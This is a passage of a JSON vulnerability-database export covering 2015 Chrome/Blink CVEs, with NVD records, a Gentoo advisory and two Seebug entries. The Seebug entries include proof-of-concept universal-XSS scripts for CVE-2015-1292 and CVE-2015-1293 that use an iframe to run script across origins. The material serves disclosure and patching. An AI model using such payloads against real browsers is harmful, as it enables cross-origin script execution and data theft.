"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "The ContainerNode::parserRemoveChild function in core/dom/ContainerNode.cpp in Blink, as used in Google Chrome before 45.0.2454.85, does not check whether a node is expected, which allows remote attackers to bypass the Same Origin Policy or cause a denial of service (DOM tree corruption) via a web site with crafted JavaScript code and IFRAME elements.", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1291", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1291"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1291", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1291", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "The FrameFetchContext::updateTimingInfoForIFrameNavigation function in core/loader/FrameFetchContext.cpp in Blink, as used in Google Chrome before 45.0.2454.85, does not properly restrict the availability of IFRAME Resource Timing API times, which allows remote attackers to obtain sensitive information via crafted JavaScript code that leverages a history.back call.", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1300", "type": "cve", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1300"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1300", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1300", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "The NavigatorServiceWorker::serviceWorker function in modules/serviceworkers/NavigatorServiceWorker.cpp in Blink, as used in Google Chrome before 45.0.2454.85, allows remote attackers to bypass the Same Origin Policy by accessing a Service Worker.", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1292", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1292"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1292", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1292", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "The DOM implementation in Blink, as used in Google Chrome before 45.0.2454.85, allows remote attackers to bypass the Same Origin Policy via unspecified vectors.", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1293", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1293"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1293", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1293", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T11:59:27", "description": "#### VULNERABILITY DETAILS\r\nFrom /WebKit/Source/modules/serviceworkers/ServiceWorkerContainer.cpp:\r\n\r\n```\r\nScriptPromise ServiceWorkerContainer::ready(ScriptState* callerState)\r\n{\r\n if (!executionContext())\r\n return ScriptPromise();\r\n(...)\r\n if (!m_ready) {\r\n m_ready = createReadyProperty();\r\n if (m_provider)\r\n m_provider->getRegistrationForReady(new GetRegistrationForReadyCallback(m_ready.get()));\r\n }\r\n\r\n return m_ready->promise(callerState->world());\r\n}\r\n```\r\n\r\n|m_ready| inherits the execution context of the serviceWorkerContainer, and that's the context associated with the navigator's frame when the container is created in NavigatorServiceWorker::serviceWorker. The navigator object can be recreated with the frame holding a cross-origin window, so the promise object created in the |m_ready->promise(callerState->world())| call may end up using a wrong creation context.\r\n\r\n#### VERSION\r\nChrome 44.0.2403.155 (Stable) \r\nChrome 45.0.2454.46 (Beta) \r\nChrome 46.0.2486.0 (Dev) \r\nChromium 46.0.2488.0 (Release build compiled today)\r\n\r\n#### REPRODUCTION CASE\r\n```\r\n<script>\r\nvar i = document.documentElement.appendChild(document.createElement('iframe'));\r\nvar f = frames[0].Function;\r\ni.onload = function() {\r\n f('return navigator')().serviceWorker.ready.constructor.constructor('alert(location)')();\r\n}\r\ni.src = 'https://abc.xyz';\r\n</script>\r\n```", "published": "2017-04-24T00:00:00", "type": "seebug", "title": "Chrome Universal XSS using navigator.serviceWorker.ready (CVE-2015-1292)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1292"], "modified": "2017-04-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93034", "id": "SSV:93034", "sourceData": "\n <script>\r\nvar i = document.documentElement.appendChild(document.createElement('iframe'));\r\nvar f = frames[0].Function;\r\ni.onload = function() {\r\n f('return navigator')().serviceWorker.ready.constructor.constructor('alert(location)')();\r\n}\r\ni.src = 'https://abc.xyz';\r\n</script>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93034", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T11:58:07", "description": "#### VULNERABILITY DETAILS\r\nFrom /WebKit/Source/core/frame/DOMWindow.cpp:\r\n\r\n```\r\nbool DOMWindow::isInsecureScriptAccess(LocalDOMWindow& callingWindow, const String& urlString)\r\n{\r\n if (!protocolIsJavaScript(urlString))\r\n return false;\r\n\r\n // If this DOMWindow isn't currently active in the Frame, then there's no\r\n // way we should allow the access.\r\n if (isCurrentlyDisplayedInFrame()) {\r\n // FIXME: Is there some way to eliminate the need for a separate \"callingWindow == this\" check?\r\n if (&callingWindow == this)\r\n return false;\r\n\r\n // FIXME: The name canAccess seems to be a roundabout way to ask \"can execute script\".\r\n // Can we name the SecurityOrigin function better to make this more clear?\r\n if (callingWindow.frame()->securityContext()->securityOrigin()->canAccessCheckSuborigins(frame()->securityContext()->securityOrigin()))\r\n return false;\r\n }\r\n\r\n callingWindow.printErrorMessage(crossDomainAccessErrorMessage(&callingWindow));\r\n return true;\r\n}\r\n\r\n```\r\n\r\n|callingWindow| may be an unloaded window whose associated |frame()| holds another, potentially cross-origin document. As a result, the security check can be bypassed.\r\n\r\n#### VERSION\r\nChrome 44.0.2403.157 (Stable)\r\nChrome 45.0.2454.46 (Beta)\r\nChrome 46.0.2486.0 (Dev)\r\nChromium 47.0.2493.0 (Release build compiled today)\r\n\r\n#### REPRODUCTION CASE\r\n```\r\n<script>\r\nvar i = document.documentElement.appendChild(document.createElement('iframe'));\r\nvar f = frames[0].Function;\r\ni.onload = function() {\r\n f(\"location.replace('javascript:alert(location)')\")();\r\n}\r\ni.src = 'https://abc.xyz';\r\n</script>\r\n```", "published": "2017-04-24T00:00:00", "type": "seebug", "title": "Chrome Universal XSS by loading a javascript: URI from an unloaded window (CVE-2015-1293)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1293"], "modified": "2017-04-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93033", "id": "SSV:93033", "sourceData": "\n <script>\r\nvar i = document.documentElement.appendChild(document.createElement('iframe'));\r\nvar f = frames[0].Function;\r\ni.onload = function() {\r\n f(\"location.replace('javascript:alert(location)')\")();\r\n}\r\ni.src = 'https://abc.xyz';\r\n</script>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93033", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2015-6776", "CVE-2016-1628", "CVE-2016-1634", "CVE-2015-6775", "CVE-2016-1638", "CVE-2015-6789", "CVE-2015-6766", "CVE-2015-6762", "CVE-2015-8126", "CVE-2015-1288", "CVE-2015-1281", "CVE-2015-6764", "CVE-2016-1612", "CVE-2015-6770", "CVE-2015-6760", "CVE-2015-6781", "CVE-2015-1291", "CVE-2016-1615", "CVE-2015-1275", "CVE-2016-1626", "CVE-2016-1618", "CVE-2015-1297", "CVE-2015-1286", "CVE-2016-1613", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-6771", "CVE-2015-1289", "CVE-2015-1296", "CVE-2015-1270", "CVE-2015-6784", "CVE-2015-1272", "CVE-2015-1283", "CVE-2015-1279", "CVE-2015-1274", "CVE-2015-1300", "CVE-2015-1287", "CVE-2016-1621", "CVE-2016-1631", "CVE-2015-6774", "CVE-2015-6778", "CVE-2016-1640", "CVE-2016-1632", "CVE-2015-1282", "CVE-2016-1622", "CVE-2015-6772", "CVE-2015-1285", "CVE-2016-1639", "CVE-2016-1616", "CVE-2015-1302", "CVE-2015-1293", "CVE-2015-6758", "CVE-2015-1303", "CVE-2015-1294", "CVE-2016-1635", "CVE-2015-1276", "CVE-2015-1278", "CVE-2016-1620", "CVE-2015-6767", "CVE-2015-6783", "CVE-2016-1636", "CVE-2015-6787", "CVE-2015-6792", "CVE-2015-1277", "CVE-2016-1627", "CVE-2015-6786", "CVE-2016-1641", "CVE-2016-1633", "CVE-2016-1624", "CVE-2016-1617", "CVE-2015-6791", "CVE-2016-1629", "CVE-2015-6780", "CVE-2015-6785", "CVE-2015-6790", "CVE-2016-1619", "CVE-2015-1271", "CVE-2015-1292", "CVE-2015-6779", "CVE-2015-6788", "CVE-2015-6759", "CVE-2015-1273", "CVE-2015-6756", "CVE-2015-6768", "CVE-2015-6763", "CVE-2016-1630", "CVE-2016-1637", "CVE-2015-6765", "CVE-2015-6755", "CVE-2015-6769", "CVE-2015-6773", "CVE-2015-1304", "CVE-2015-6777", "CVE-2015-1280", "CVE-2015-1299", "CVE-2015-6757", "CVE-2016-1623", "CVE-2015-6782", "CVE-2016-1625", "CVE-2015-1284", "CVE-2016-1614", "CVE-2015-6761"], "edition": 1, "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\n### Description\n\nMultiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-49.0.2623.87\"", "modified": "2016-03-12T00:00:00", "published": "2016-03-12T00:00:00", "id": "GLSA-201603-09", "href": "https://security.gentoo.org/glsa/201603-09", "type": "gentoo", "title": "Chromium: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}